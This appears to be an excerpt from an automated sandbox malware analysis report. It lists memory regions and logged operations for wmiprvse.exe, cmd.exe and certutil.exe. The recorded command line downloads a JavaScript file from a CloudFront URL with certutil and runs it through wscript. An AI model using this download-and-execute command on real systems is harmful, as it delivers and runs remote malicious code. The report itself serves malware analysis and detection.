pagefile_0x0000000893a30000 0x893a30000 0x893a30fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000893a40000 0x893a40000 0x893b3ffff Private Memory Readable, Writable True True False
pagefile_0x0000000893b40000 0x893b40000 0x893b40fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000893b50000 0x893b50000 0x893b50fff Pagefile Backed Memory Readable True False False -
cimwin32.dll.mui 0x893b70000 0x893b72fff Memory Mapped File Readable False False False -
private_0x0000000893ba0000 0x893ba0000 0x893baffff Private Memory Readable, Writable True True False
sortdefault.nls 0x893bb0000 0x893ee6fff Memory Mapped File Readable False False False -
pagefile_0x0000000893ef0000 0x893ef0000 0x894077fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000894080000 0x894080000 0x894200fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000894210000 0x894210000 0x8942cffff Pagefile Backed Memory Readable True False False -
private_0x00000008942d0000 0x8942d0000 0x89434ffff Private Memory Readable, Writable True True False
private_0x0000000894350000 0x894350000 0x89444ffff Private Memory Readable, Writable True True False
private_0x0000000894450000 0x894450000 0x8944cffff Private Memory Readable, Writable True True False
private_0x00000008944d0000 0x8944d0000 0x89454ffff Private Memory Readable, Writable True True False
private_0x0000000894550000 0x894550000 0x8945cffff Private Memory Readable, Writable True True False
private_0x00000008945d0000 0x8945d0000 0x89464ffff Private Memory Readable, Writable True True False
private_0x0000000894650000 0x894650000 0x8946cffff Private Memory Readable, Writable True True False
pagefile_0x00007df5ffb20000 0x7df5ffb20000 0x7ff5ffb1ffff Pagefile Backed Memory - True False False -
private_0x00007ff7b9b5c000 0x7ff7b9b5c000 0x7ff7b9b5dfff Private Memory Readable, Writable True True False
private_0x00007ff7b9b5e000 0x7ff7b9b5e000 0x7ff7b9b5ffff Private Memory Readable, Writable True True False
pagefile_0x00007ff7b9b60000 0x7ff7b9b60000 0x7ff7b9c5ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff7b9c60000 0x7ff7b9c60000 0x7ff7b9c82fff Pagefile Backed Memory Readable True False False -
private_0x00007ff7b9c84000 0x7ff7b9c84000 0x7ff7b9c85fff Private Memory Readable, Writable True True False
private_0x00007ff7b9c86000 0x7ff7b9c86000 0x7ff7b9c86fff Private Memory Readable, Writable True True False
private_0x00007ff7b9c88000 0x7ff7b9c88000 0x7ff7b9c89fff Private Memory Readable, Writable True True False
private_0x00007ff7b9c8a000 0x7ff7b9c8a000 0x7ff7b9c8bfff Private Memory Readable, Writable True True False
private_0x00007ff7b9c8c000 0x7ff7b9c8c000 0x7ff7b9c8dfff Private Memory Readable, Writable True True False
private_0x00007ff7b9c8e000 0x7ff7b9c8e000 0x7ff7b9c8ffff Private Memory Readable, Writable True True False
wmiprvse.exe 0x7ff7ba0c0000 0x7ff7ba13efff Memory Mapped File Readable, Writable, Executable False False False -
cimwin32.dll 0x7ffb25560000 0x7ffb2572dfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x7ffb25de0000 0x7ffb25e2dfff Memory Mapped File Readable, Writable, Executable False False False -
ncobjapi.dll 0x7ffb2d450000 0x7ffb2d465fff Memory Mapped File Readable, Writable, Executable False False False -
wmiutils.dll 0x7ffb2d700000 0x7ffb2d724fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x7ffb2d730000 0x7ffb2d743fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x7ffb2d750000 0x7ffb2d847fff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x7ffb2e4a0000 0x7ffb2e4b0fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x7ffb33330000 0x7ffb333aefff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffb39260000 0x7ffb39292fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x7ffb39350000 0x7ffb3936efff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffb39610000 0x7ffb39626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffb39780000 0x7ffb3978afff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffb39960000 0x7ffb3998bfff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffb39b60000 0x7ffb39b87fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffb39b90000 0x7ffb39bfafff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffb39d60000 0x7ffb39d6efff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffb39d70000 0x7ffb39d82fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffb39d90000 0x7ffb39dd9fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffb3a800000 0x7ffb3a9dcfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x7ffb3a9e0000 0x7ffb3a9e7fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffb3bf80000 0x7ffb3c0a5fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffb3c2d0000 0x7ffb3c375fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffb3c3e0000 0x7ffb3c564fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ffb3c570000 0x7ffb3c5d8fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffb3c650000 0x7ffb3c79dfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffb3c950000 0x7ffb3c9aafff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffb3c9b0000 0x7ffb3ca6dfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffb3ca70000 0x7ffb3cb14fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffb3cc70000 0x7ffb3ceebfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffb3cf10000 0x7ffb3cfacfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffb3d260000 0x7ffb3d30cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
Process #4: cmd.exe
Information Value
ID #4
File Name c:\windows\system32\cmd.exe
Command Line cmd.exe /c certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\Users\Public\en-US.js && wscript.exe C:\Users\Public\en-US.js
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:40, Reason: Child Process
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:09:53
OS Process Information
Information Value
PID 0xc40
Parent PID 0xae8 (c:\windows\system32\wbem\wmiprvse.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xC44, 0xBEC
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x0000004e96db0000 0x4e96db0000 0x4e96dcffff Private Memory Readable, Writable True True False
pagefile_0x0000004e96db0000 0x4e96db0000 0x4e96dbffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000004e96dc0000 0x4e96dc0000 0x4e96dc6fff Private Memory Readable, Writable True True False
pagefile_0x0000004e96dd0000 0x4e96dd0000 0x4e96de3fff Pagefile Backed Memory Readable True False False -
private_0x0000004e96df0000 0x4e96df0000 0x4e96eeffff Private Memory Readable, Writable True True False
pagefile_0x0000004e96ef0000 0x4e96ef0000 0x4e96ef3fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004e96f00000 0x4e96f00000 0x4e96f00fff Pagefile Backed Memory Readable True False False -
private_0x0000004e96f10000 0x4e96f10000 0x4e96f11fff Private Memory Readable, Writable True True False
locale.nls 0x4e96f20000 0x4e96fddfff Memory Mapped File Readable False False False -
private_0x0000004e96fe0000 0x4e96fe0000 0x4e970dffff Private Memory Readable, Writable True True False
private_0x0000004e970e0000 0x4e970e0000 0x4e970e6fff Private Memory Readable, Writable True True False
private_0x0000004e970f0000 0x4e970f0000 0x4e971effff Private Memory Readable, Writable True True False
private_0x0000004e973b0000 0x4e973b0000 0x4e973bffff Private Memory Readable, Writable True True False
sortdefault.nls 0x4e973c0000 0x4e976f6fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ff750000 0x7df5ff750000 0x7ff5ff74ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff78fa70000 0x7ff78fa70000 0x7ff78fb6ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff78fb70000 0x7ff78fb70000 0x7ff78fb92fff Pagefile Backed Memory Readable True False False -
private_0x00007ff78fb9b000 0x7ff78fb9b000 0x7ff78fb9cfff Private Memory Readable, Writable True True False
private_0x00007ff78fb9d000 0x7ff78fb9d000 0x7ff78fb9efff Private Memory Readable, Writable True True False
private_0x00007ff78fb9f000 0x7ff78fb9f000 0x7ff78fb9ffff Private Memory Readable, Writable True True False
cmd.exe 0x7ff7906e0000 0x7ff790738fff Memory Mapped File Readable, Writable, Executable True False False -
kernelbase.dll 0x7ffb3a800000 0x7ffb3a9dcfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffb3cf10000 0x7ffb3cfacfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffb3d260000 0x7ffb3d30cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
Threads
Thread 0xc44
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\cmd.exe, base_address = 0x7ff7906e0000 True 1 Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1 Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffb3d27d550 True 1 Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1 Fn
File Open filename = STD_OUTPUT_HANDLE True 3 Fn
File Open filename = STD_INPUT_HANDLE True 2 Fn
Environment Get Environment String - True 2 Fn, Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1 Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1 Fn
Module Get Filename process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1 Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1 Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1 Fn
Environment Get Environment String name = PROMPT False 1 Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1 Fn
Environment Get Environment String - True 1 Fn, Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1 Fn
Environment Get Environment String name = KEYS False 1 Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1 Fn
File Get Info filename = C:\Windows\System32, type = file_attributes True 1 Fn
Environment Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7ffb3d2825e0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7ffb3d281f90 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7ffb3a853a10 True 1
Fn
File Get Info filename = certutil.exe, type = file_attributes True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\certutil.exe, os_pid = 0xcf4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Get Info filename = wscript.exe, type = file_attributes True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\wscript.exe, os_pid = 0x33c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #6: certutil.exe
Information Value
ID #6
File Name c:\windows\system32\certutil.exe
Command Line certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\Users\Public\en-US.js
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:41, Reason: Child Process
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:09:52
OS Process Information
Information Value
PID 0xcf4
Parent PID 0xc40 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xCE8
0xCF0
0x2DC
0x1F4
0x9D4
0xCFC
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x0000004d31600000 0x4d31600000 0x4d3161ffff Private Memory Readable, Writable True True False
pagefile_0x0000004d31600000 0x4d31600000 0x4d3160ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000004d31610000 0x4d31610000 0x4d31616fff Private Memory Readable, Writable True True False
pagefile_0x0000004d31620000 0x4d31620000 0x4d31633fff Pagefile Backed Memory Readable True False False -
private_0x0000004d31640000 0x4d31640000 0x4d316bffff Private Memory Readable, Writable True True False
pagefile_0x0000004d316c0000 0x4d316c0000 0x4d316c3fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004d316d0000 0x4d316d0000 0x4d316d0fff Pagefile Backed Memory Readable True False False -
private_0x0000004d316e0000 0x4d316e0000 0x4d316e1fff Private Memory Readable, Writable True True False
locale.nls 0x4d316f0000 0x4d317adfff Memory Mapped File Readable False False False -
private_0x0000004d317b0000 0x4d317b0000 0x4d3182ffff Private Memory Readable, Writable True True False
pagefile_0x0000004d31830000 0x4d31830000 0x4d31831fff Pagefile Backed Memory Readable True False False -
private_0x0000004d31840000 0x4d31840000 0x4d31846fff Private Memory Readable, Writable True True False
certutil.exe.mui 0x4d31850000 0x4d31875fff Memory Mapped File Readable False False False -
private_0x0000004d31880000 0x4d31880000 0x4d31880fff Private Memory Readable, Writable True True False
private_0x0000004d31890000 0x4d31890000 0x4d31890fff Private Memory Readable, Writable True True False
private_0x0000004d318a0000 0x4d318a0000 0x4d318a0fff Private Memory Readable, Writable True True False
private_0x0000004d318b0000 0x4d318b0000 0x4d318cffff Private Memory Readable, Writable True True False
pagefile_0x0000004d318b0000 0x4d318b0000 0x4d318b0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004d318b0000 0x4d318b0000 0x4d318b3fff Pagefile Backed Memory Readable True False False -
private_0x0000004d318c0000 0x4d318c0000 0x4d318cffff Private Memory Readable, Writable True True False
private_0x0000004d318d0000 0x4d318d0000 0x4d319cffff Private Memory Readable, Writable True True False
crypt32.dll.mui 0x4d319d0000 0x4d319d9fff Memory Mapped File Readable False False False -
winnlsres.dll 0x4d319e0000 0x4d319e4fff Memory Mapped File Readable False False False -
winnlsres.dll.mui 0x4d319f0000 0x4d319fffff Memory Mapped File Readable False False False -
private_0x0000004d31a00000 0x4d31a00000 0x4d31a0ffff Private Memory Readable, Writable True True False
pagefile_0x0000004d31a10000 0x4d31a10000 0x4d31ac7fff Pagefile Backed Memory Readable True False False -
private_0x0000004d31ad0000 0x4d31ad0000 0x4d31ad0fff Private Memory Readable, Writable True True False
mswsock.dll.mui 0x4d31ad0000 0x4d31ad2fff Memory Mapped File Readable False False False -
pagefile_0x0000004d31ae0000 0x4d31ae0000 0x4d31ae1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000004d31af0000 0x4d31af0000 0x4d31af0fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x4d31b00000 0x4d31b00fff Memory Mapped File Readable, Writable True True False
pagefile_0x0000004d31b10000 0x4d31b10000 0x4d31b10fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000004d31b20000 0x4d31b20000 0x4d31b21fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004d31b30000 0x4d31b30000 0x4d31b3ffff Pagefile Backed Memory Readable True False False -
private_0x0000004d31b40000 0x4d31b40000 0x4d31b4ffff Private Memory Readable, Writable True True False
sortdefault.nls 0x4d31b50000 0x4d31e86fff Memory Mapped File Readable False False False -
pagefile_0x0000004d31e90000 0x4d31e90000 0x4d32017fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004d32020000 0x4d32020000 0x4d321a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000004d321b0000 0x4d321b0000 0x4d335affff Pagefile Backed Memory Readable True False False -
private_0x0000004d335b0000 0x4d335b0000 0x4d3362ffff Private Memory Readable, Writable True True False
private_0x0000004d33630000 0x4d33630000 0x4d336affff Private Memory Readable, Writable True True False
private_0x0000004d336b0000 0x4d336b0000 0x4d3372ffff Private Memory Readable, Writable True True False
private_0x0000004d33730000 0x4d33730000 0x4d337affff Private Memory Readable, Writable True True False
private_0x0000004d337b0000 0x4d337b0000 0x4d338affff Private Memory Readable, Writable True True False
pagefile_0x0000004d338b0000 0x4d338b0000 0x4d338b1fff Pagefile Backed Memory Readable True False False -
private_0x0000004d338c0000 0x4d338c0000 0x4d33abffff Private Memory Readable, Writable True True False
private_0x0000004d33ac0000 0x4d33ac0000 0x4d33ebffff Private Memory Readable, Writable True True False
pagefile_0x00007df5ff790000 0x7df5ff790000 0x7ff5ff78ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff6bab50000 0x7ff6bab50000 0x7ff6bac4ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff6bac50000 0x7ff6bac50000 0x7ff6bac72fff Pagefile Backed Memory Readable True False False -
private_0x00007ff6bac73000 0x7ff6bac73000 0x7ff6bac74fff Private Memory Readable, Writable True True False
private_0x00007ff6bac75000 0x7ff6bac75000 0x7ff6bac76fff Private Memory Readable, Writable True True False
private_0x00007ff6bac77000 0x7ff6bac77000 0x7ff6bac77fff Private Memory Readable, Writable True True False
private_0x00007ff6bac78000 0x7ff6bac78000 0x7ff6bac79fff Private Memory Readable, Writable True True False
private_0x00007ff6bac7a000 0x7ff6bac7a000 0x7ff6bac7bfff Private Memory Readable, Writable True True False
private_0x00007ff6bac7c000 0x7ff6bac7c000 0x7ff6bac7dfff Private Memory Readable, Writable True True False
private_0x00007ff6bac7e000 0x7ff6bac7e000 0x7ff6bac7ffff Private Memory Readable, Writable True True False
certutil.exe 0x7ff6baf50000 0x7ff6bb0a7fff Memory Mapped File Readable, Writable, Executable True False False -
certcli.dll 0x7ffb21cd0000 0x7ffb21d43fff Memory Mapped File Readable, Writable, Executable False False False -
cryptui.dll 0x7ffb21d50000 0x7ffb21de8fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x7ffb21df0000 0x7ffb21e99fff Memory Mapped File Readable, Writable, Executable False False False -
certca.dll 0x7ffb23a70000 0x7ffb23b2efff Memory Mapped File Readable, Writable, Executable False False False -
mskeyprotect.dll 0x7ffb25e30000 0x7ffb25e43fff Memory Mapped File Readable, Writable, Executable False False False -
ncryptsslp.dll 0x7ffb25ee0000 0x7ffb25efefff Memory Mapped File Readable, Writable, Executable False False False -
ntdsapi.dll 0x7ffb25f00000 0x7ffb25f27fff Memory Mapped File Readable, Writable, Executable False False False -
webio.dll 0x7ffb2ae50000 0x7ffb2aecffff Memory Mapped File Readable, Writable, Executable False False False -
cryptnet.dll 0x7ffb2dd00000 0x7ffb2dd2efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x7ffb2e5a0000 0x7ffb2e846fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x7ffb2ea50000 0x7ffb2ebe6fff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x7ffb2ec80000 0x7ffb2ec94fff Memory Mapped File Readable, Writable, Executable False False False -
netapi32.dll 0x7ffb30240000 0x7ffb30256fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x7ffb308c0000 0x7ffb308c9fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffb318d0000 0x7ffb318d9fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x7ffb31aa0000 0x7ffb31e15fff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x7ffb333f0000 0x7ffb334c5fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x7ffb334d0000 0x7ffb334dbfff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x7ffb34cc0000 0x7ffb34f33fff Memory Mapped File Readable, Writable, Executable False False False -
cabinet.dll 0x7ffb34f40000 0x7ffb34f66fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x7ffb361e0000 0x7ffb36247fff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc.dll 0x7ffb362a0000 0x7ffb362b9fff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc6.dll 0x7ffb362c0000 0x7ffb362d5fff Memory Mapped File Readable, Writable, Executable False False False -
samcli.dll 0x7ffb366c0000 0x7ffb366d7fff Memory Mapped File Readable, Writable, Executable False False False -
wkscli.dll 0x7ffb36c00000 0x7ffb36c15fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x7ffb373f0000 0x7ffb373fafff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x7ffb37410000 0x7ffb37447fff Memory Mapped File Readable, Writable, Executable False False False -
dsrole.dll 0x7ffb37460000 0x7ffb37469fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7ffb37f40000 0x7ffb37f61fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7ffb38610000 0x7ffb386a5fff Memory Mapped File Readable, Writable, Executable False False False -
gpapi.dll 0x7ffb38c60000 0x7ffb38c82fff Memory Mapped File Readable, Writable, Executable False False False -
netutils.dll 0x7ffb38f90000 0x7ffb38f9bfff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x7ffb38fa0000 0x7ffb38fc5fff Memory Mapped File Readable, Writable, Executable False False False -
schannel.dll 0x7ffb390e0000 0x7ffb39153fff Memory Mapped File Readable, Writable, Executable False False False -
dpapi.dll 0x7ffb39160000 0x7ffb39169fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffb39260000 0x7ffb39292fff Memory Mapped File Readable, Writable, Executable False False False -
logoncli.dll 0x7ffb39370000 0x7ffb393adfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x7ffb393b0000 0x7ffb39457fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x7ffb395b0000 0x7ffb3960cfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffb39610000 0x7ffb39626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffb39780000 0x7ffb3978afff Memory Mapped File Readable, Writable, Executable False False False -
ntasn1.dll 0x7ffb39810000 0x7ffb39845fff Memory Mapped File Readable, Writable, Executable False False False -
ncrypt.dll 0x7ffb39850000 0x7ffb39875fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffb39960000 0x7ffb3998bfff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffb39b60000 0x7ffb39b87fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffb39b90000 0x7ffb39bfafff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ffb39d40000 0x7ffb39d50fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffb39d60000 0x7ffb39d6efff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffb39d70000 0x7ffb39d82fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffb39d90000 0x7ffb39dd9fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffb39de0000 0x7ffb3a407fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ffb3a410000 0x7ffb3a453fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ffb3a460000 0x7ffb3a4b3fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffb3a570000 0x7ffb3a622fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ffb3a630000 0x7ffb3a7f0fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffb3a800000 0x7ffb3a9dcfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x7ffb3a9e0000 0x7ffb3a9e7fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffb3a9f0000 0x7ffb3aa40fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffb3aa50000 0x7ffb3bf74fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffb3bf80000 0x7ffb3c0a5fff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x7ffb3c0b0000 0x7ffb3c0b6fff Memory Mapped File Readable, Writable, Executable False False False -
